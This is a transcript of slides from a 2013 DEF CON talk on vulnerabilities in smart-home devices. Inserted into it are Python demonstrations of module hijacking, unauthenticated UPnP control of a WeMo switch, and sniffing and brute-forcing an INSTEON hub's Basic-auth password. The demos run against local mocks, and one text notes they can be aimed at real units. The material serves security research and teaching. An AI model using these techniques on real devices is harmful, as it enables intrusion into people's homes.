home invasion 2.0 - def con 21 - 2013
DESCRIPTION
A talk discussing vulnerabilities in various "smart home" technologies, from home automation gear to a child's toy.
TRANSCRIPT
© 2012
Home Invasion v2.0
WHO ARE WE?
The Presenters
• Daniel “unicornFurnace” Crowley, Managing Consultant, Trustwave SpiderLabs
• Jennifer “savagejen” Savage, Software Engineer, Tabbedout
• David “videoman” Bryan, Security Consultant, Trustwave SpiderLabs
WHAT ARE WE DOING HERE?
• Science fiction becomes science fact
• Race to release novel products means poor security
• Attempt to hack a sampling of “smart” devices
• Many products we didn’t cover
  o Android powered oven
  o Smart TVs (another talk is covering one!)
  o IP security cameras
The “Smart” Home
WHAT’S OUT THERE NOW?
• Locks, thermostats, fridges, toilets, lights, toys
WHAT’S IN THE FUTURE?
• Entire smart cities like Songdo
Karotz Smart Rabbit
• Exposure of wifi network credentials unencrypted
• Unencrypted remote API calls
• Unencrypted setup package download
• Python module hijack in autorunwifi script
Karotz Smart Rabbit: Python Module Hijacking
• Python Module Hijacking is insecure library loading
  o Similar to LD_PRELOAD and DLL hijacking
• Python loads modules from the directory of the script first (it is the first entry on sys.path)
• Karotz autorunwifi script uses the simplejson module
  o Put code to execute in simplejson.py in the same directory as autorunwifi
• Defeats code signing: the signed script is untouched, but the unsigned module it imports is attacker-controlled
Karotz Smart Rabbit: An attacker could:
• MITM the insecure connection to the Karotz server
• Replace the user's download with a malicious version
• Use the vuln to make Karotz run their own code!
• ...Bunny botnet?
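The import-order bug behind the autorunwifi hijack, as an added example that is not code from the talk or from the Karotz firmware. A stand-in "signed" script imports simplejson; an attacker who can write to the script's directory drops a simplejson.py beside it, and because Python puts the script's own directory first on sys.path, the attacker's copy loads instead of the real one. A hardened variant strips the script directory from sys.path before importing and then checks where the module actually came from. The "trusted" simplejson, the hijack module and both scripts are constructed in a temporary directory; the real module's location is assumed to be whatever PYTHONPATH points at.

```python
"""Python module hijacking (Karotz autorunwifi pattern), constructed demo."""
import os
import subprocess
import sys
import tempfile
import textwrap

# Stand-in for the real, system-installed simplejson (placed on PYTHONPATH).
TRUSTED_MODULE = 'ORIGIN = "trusted"\n'

# What the attacker drops next to the script.  A real payload would do its
# work at import time; this one only announces itself on stderr.
HIJACK_MODULE = (
    'import sys\n'
    'ORIGIN = "hijacked"\n'
    'sys.stderr.write("attacker code ran at import time\\n")\n'
)

# The "signed" script: nothing wrong with its own code, only with where
# Python resolves its import from.
VULNERABLE_SCRIPT = textwrap.dedent("""\
    import simplejson
    print(simplejson.ORIGIN)
""")

# Hardened: drop the script's own directory from sys.path before importing,
# then refuse to run unless the module came from the trusted location
# (TRUSTED_DIR is an environment variable this demo sets; an assumption).
HARDENED_SCRIPT = textwrap.dedent("""\
    import os, sys
    here = os.path.realpath(os.path.dirname(os.path.abspath(__file__)))
    sys.path = [p for p in sys.path
                if os.path.realpath(p or os.getcwd()) != here]
    import simplejson
    trusted = os.path.realpath(os.environ["TRUSTED_DIR"])
    if not os.path.realpath(simplejson.__file__).startswith(trusted + os.sep):
        sys.exit("refusing to run: simplejson loaded from " + simplejson.__file__)
    print(simplejson.ORIGIN)
""")


def _write(path, text):
    with open(path, "w") as fh:
        fh.write(text)


def _run(script, trusted_dir):
    """Run one script in a child interpreter; return what it printed."""
    env = dict(os.environ, PYTHONPATH=trusted_dir, TRUSTED_DIR=trusted_dir,
               PYTHONDONTWRITEBYTECODE="1")
    env.pop("PYTHONSAFEPATH", None)   # 3.11+ knob that would mask the bug
    out = subprocess.run([sys.executable, script], env=env,
                         capture_output=True, text=True)
    return out.stdout.strip() or out.stderr.strip()


def run_scenario():
    """Return which simplejson each script ended up importing."""
    with tempfile.TemporaryDirectory() as tmp:
        trusted_dir = os.path.join(tmp, "site-packages")   # "real" module
        script_dir = os.path.join(tmp, "karotz")           # script + hijack
        os.makedirs(trusted_dir)
        os.makedirs(script_dir)
        _write(os.path.join(trusted_dir, "simplejson.py"), TRUSTED_MODULE)
        _write(os.path.join(script_dir, "simplejson.py"), HIJACK_MODULE)
        vuln = os.path.join(script_dir, "autorunwifi_vuln.py")
        hard = os.path.join(script_dir, "autorunwifi_hard.py")
        _write(vuln, VULNERABLE_SCRIPT)
        _write(hard, HARDENED_SCRIPT)
        return {
            "vulnerable": _run(vuln, trusted_dir),
            "hardened": _run(hard, trusted_dir),
        }


if __name__ == "__main__":
    print(run_scenario())   # {'vulnerable': 'hijacked', 'hardened': 'trusted'}
```

The hardened script is the check a signed launcher should make: a signature over autorunwifi says nothing about simplejson.py sitting next to it, so either the writable script directory must not be on the import path or the resolved module path must be verified against the trusted location. Stripping sys.path[0] is the same idea as Python 3.11's -P / PYTHONSAFEPATH, done in-script so it works on the older interpreter a device like this ships.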
Belkin WeMo Switch
• Vulnerable libupnp version
  o Remote pre-auth root
• Unauthenticated UPnP actions
  o SetBinaryState
  o SetFriendlyName
• EULA used to “secure” the device
• Belkin has been awesome!
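What an unauthenticated UPnP action looks like on the wire, as an added example that is not Belkin code or the talk's tooling. A UPnP action is a SOAP POST to the service's control URL; nothing in the request carries a credential, so anyone who can reach the port can flip the relay or rename the switch. The service type and control path used here (the basicevent service) are assumptions about the device, and the "device" is a constructed loopback mock that, like the slides say the real one does, checks nothing but the action name.

```python
"""Unauthenticated UPnP SOAP actions (WeMo SetBinaryState / SetFriendlyName)."""
import re
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import Request, urlopen

SERVICE = "urn:Belkin:service:basicevent:1"   # assumed service type
CONTROL_PATH = "/upnp/control/basicevent1"    # assumed control URL

ENVELOPE = (
    '<?xml version="1.0" encoding="utf-8"?>'
    '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
    's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
    '<s:Body><u:{action} xmlns:u="{service}">{args}</u:{action}></s:Body>'
    '</s:Envelope>'
)


def build_action(action, args, service=SERVICE):
    """Return (headers, body) for a UPnP action.  Note what is absent:
    no Authorization header, no token, no session cookie."""
    body = ENVELOPE.format(
        action=action, service=service,
        args="".join(f"<{k}>{v}</{k}>" for k, v in args.items()))
    headers = {
        "Content-Type": 'text/xml; charset="utf-8"',
        "SOAPACTION": f'"{service}#{action}"',
    }
    return headers, body.encode()


def parse_arg(xml, name):
    """Pull one <name>value</name> argument out of a SOAP body."""
    m = re.search(rf"<{name}>(.*?)</{name}>", xml, re.S)
    return m.group(1).strip() if m else None


class MockWemo(BaseHTTPRequestHandler):
    """Constructed loopback stand-in for the switch: honours
    SetBinaryState / SetFriendlyName / GetBinaryState for any caller."""
    state = {"BinaryState": "0", "FriendlyName": "WeMo Switch"}

    def do_POST(self):
        body = self.rfile.read(int(self.headers["Content-Length"])).decode()
        action = self.headers.get("SOAPACTION", "").strip('"').split("#")[-1]
        if action == "SetBinaryState":
            self.state["BinaryState"] = parse_arg(body, "BinaryState")
        elif action == "SetFriendlyName":
            self.state["FriendlyName"] = parse_arg(body, "FriendlyName")
        elif action != "GetBinaryState":
            self.send_error(500)
            return
        resp = ENVELOPE.format(
            action=action + "Response", service=SERVICE,
            args=f"<BinaryState>{self.state['BinaryState']}</BinaryState>"
                 f"<FriendlyName>{self.state['FriendlyName']}</FriendlyName>")
        self.send_response(200)
        self.send_header("Content-Type", "text/xml")
        self.end_headers()
        self.wfile.write(resp.encode())

    def log_message(self, *args):   # keep the demo quiet
        pass


def send_action(base_url, action, args):
    """POST one action to the control URL and return the raw SOAP response."""
    headers, body = build_action(action, args)
    req = Request(base_url + CONTROL_PATH, data=body, headers=headers, method="POST")
    with urlopen(req) as r:
        return r.read().decode()


def demo():
    """Start the mock on loopback, rename it and switch it on with no credentials."""
    srv = HTTPServer(("127.0.0.1", 0), MockWemo)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    base = f"http://127.0.0.1:{srv.server_port}"
    try:
        send_action(base, "SetFriendlyName", {"FriendlyName": "pwned"})
        on = parse_arg(send_action(base, "SetBinaryState", {"BinaryState": 1}),
                       "BinaryState")
        name = parse_arg(send_action(base, "GetBinaryState", {}), "FriendlyName")
        return {"BinaryState": on, "FriendlyName": name}
    finally:
        srv.shutdown()


if __name__ == "__main__":
    print(demo())   # {'BinaryState': '1', 'FriendlyName': 'pwned'}
```

The practical check is the one build_action makes visible: the only things a caller needs are reachability of the control port and the service/action names, both of which the device advertises in its UPnP description. Against a real unit, point send_action at the address and port the device announces over SSDP instead of the loopback mock.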
SONOS Bridge
• Support console information disclosure
LIXIL Satis Smart Toilet
• Default Bluetooth PIN
INSTEON Hub
• Lack of authentication on web console
  o Web console exposed to the Internet
    § Time zone – city
    § Name – street
  o Control all the things.
• Fixed the authentication with model 2422-222 “R”
INSTEON Hub
• Still lack of SSL/TLS
• Uses HTTP Auth
  o Base64 encoded credentials
  o Username: admin
  o Password: ABCDEF ← INSTEON ID and last 3 of the MAC
  o #SecurityFail
  o It only takes 16 million attempts (six hex characters: 16^6 = 16,777,216)
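The two weaknesses in the hub's login, as an added example that is not INSTEON or Trustwave code. First, HTTP Basic auth over cleartext HTTP is base64, not encryption, so anyone who sees the request has the credentials; the "captured" request below is constructed, not a real capture. Second, a six-hex-character password is 16^6 = 16,777,216 guesses blind, and every character the attacker already knows divides that by 16; the split of three hex digits from the INSTEON ID and three from the MAC is an assumption that matches the 16 million figure, and the scenario where the last three MAC digits are known is my own observation (a MAC is visible to anyone on the same LAN), not something the slides state.

```python
"""INSTEON Hub: cleartext Basic auth and a structured six-hex-digit password."""
import base64
import itertools
import re

# Constructed cleartext HTTP request, as a sniffer on the path would see it.
CAPTURED_REQUEST = (
    "GET /index.htm HTTP/1.1\r\n"
    "Host: 192.168.1.50\r\n"
    "Authorization: Basic YWRtaW46MUEyQjND\r\n"
    "\r\n"
)

HEX = "0123456789ABCDEF"
PASSWORD_LEN = 6                      # "ABCDEF"-shaped password per the slides


def creds_from_request(raw):
    """Recover user and password from a Basic auth header: decode, not crack."""
    m = re.search(r"^Authorization:\s*Basic\s+(\S+)", raw, re.M | re.I)
    if not m:
        return None
    user, _, password = base64.b64decode(m.group(1)).decode().partition(":")
    return user, password


def keyspace_size(known_prefix="", known_suffix=""):
    """Blind: 16^6.  Each hex digit already known divides the space by 16."""
    return 16 ** (PASSWORD_LEN - len(known_prefix) - len(known_suffix))


def candidates(known_prefix="", known_suffix=""):
    """Enumerate every password consistent with the known digits, in order."""
    unknown = PASSWORD_LEN - len(known_prefix) - len(known_suffix)
    for digits in itertools.product(HEX, repeat=unknown):
        yield known_prefix + "".join(digits) + known_suffix


def brute_force(check, known_prefix="", known_suffix=""):
    """Return (password, attempts) for the first candidate check() accepts,
    or (None, attempts) if the space is exhausted.  check() stands in for
    one HTTP request with a Basic auth header; against a real device it
    would be a network call, so the attempt count is what matters."""
    attempts = 0
    for pw in candidates(known_prefix, known_suffix):
        attempts += 1
        if check(pw):
            return pw, attempts
    return None, attempts


def demo():
    """Blind keyspace vs. the same search once the MAC suffix is known."""
    user, password = creds_from_request(CAPTURED_REQUEST)
    # Assumed: attacker on the LAN has read the hub's MAC and takes its
    # last three hex digits as the password suffix.
    mac_suffix = password[-3:]
    found, attempts = brute_force(lambda p: p == password, known_suffix=mac_suffix)
    return {
        "sniffed": (user, password),
        "blind_keyspace": keyspace_size(),
        "lan_keyspace": keyspace_size(known_suffix=mac_suffix),
        "found": found,
        "attempts": attempts,
    }


if __name__ == "__main__":
    print(demo())
```

Either path ends at the same place. With no TLS, the base64 step in creds_from_request is the whole "attack"; without a sniffing position, the structured password turns the 16 million figure into 4,096 guesses the moment one half of it is known, which is a few minutes of HTTP requests.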
MiCasaVerde VeraLite
• Lack of authentication on web console by default
• Insufficient authorization checks
  o Firmware update
  o Settings backup
  o Test Lua code
• Path traversal
• Cross-site request forgery
• Lack of authentication on UPnP daemon
• Vulnerable libupnp version
• Server side request forgery
• Unconfirmed authentication bypass
MiCasaVerde VeraLite
• Three methods of auth bypass
• Seven methods to get root
• Two attacks remotely exploitable through SE (social engineering)
• Potential for ownage of ALL the VeraLites!
DEMONSTRATION
CONCLUSION
Daniel “unicornFurnace” Crowley [email protected] @dan_crowley
Jennifer “savagejen” Savage [email protected] (PGP key ID 6326A948) @savagejen
David “videoman” Bryan [email protected] @_videoman_
Questions?